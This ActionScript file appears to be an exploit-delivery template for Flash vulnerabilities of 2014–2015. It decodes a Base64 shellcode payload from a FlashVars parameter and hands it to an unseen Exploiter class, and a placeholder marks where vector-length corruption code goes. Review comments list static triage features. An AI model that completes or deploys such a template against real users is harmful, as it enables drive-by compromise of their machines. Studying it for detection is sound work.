/*
Code to assist the creation of exploits for the trend of Flash vulnerabilities exploited in the wild during 2014/2015.

It uses some ideas and code included in @hdarwin89's proofs of concept.

* How to build:

1. Download the AIRSDK, and use its compiler.
2. Download the Flex SDK (4.6)
3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
(all of them, including subfolders, especially mx, which is necessary for the Base64Decoder)
4. Build with: mxmlc -o msf.swf Exploit.as

*/
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import mx.utils.Base64Decoder
import flash.utils.ByteArray
/**
 * Document class of the SWF template.
 *
 * The constructor reads two FlashVars from the root LoaderInfo ("pl" and
 * "sh"), Base64-decodes "sh" into a ByteArray, and passes everything to an
 * Exploiter instance. Exploiter is defined outside this file, so what it
 * does with these values is not visible here.
 *
 * NOTE(review): for static triage, the features visible in this template
 * are the FlashVars names "pl" and "sh" together with the use of
 * mx.utils.Base64Decoder on a loader parameter.
 */
public class Exploit extends Sprite
{
    // Never assigned in this file; the placeholder comment in the constructor
    // says vulnerability-specific code is expected to act on it. As shown, it
    // is handed to Exploiter with its default value.
    private var uv:Vector.<uint>
    // Decoder used once, for the "sh" parameter.
    private var b64:Base64Decoder = new Base64Decoder()
    // Raw bytes obtained by decoding the "sh" parameter.
    private var payload:ByteArray
    // Value of the "pl" parameter, stored unchanged.
    private var platform:String
    // Helper object built at the end of the constructor (class not shown here).
    private var exploiter:Exploiter

    /**
     * Reads the loader parameters, decodes the payload and constructs the
     * Exploiter helper.
     */
    public function Exploit()
    {
        var flashVars:Object = LoaderInfo(this.root.loaderInfo).parameters

        platform = flashVars.pl

        // Spaces are turned back into "+" before decoding; presumably the "+"
        // characters of the Base64 text arrive as spaces after URL decoding
        // of the parameter -- confirm against the page that embeds the SWF.
        var encoded:String = flashVars.sh
        encoded = encoded.replace(/ /g, "+")

        b64.decode(encoded)
        payload = b64.toByteArray()

        /*
            The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
        */

        // The meaning of the last argument (0x13e) is not visible in this
        // file; see the Exploiter constructor.
        exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
    }
}
}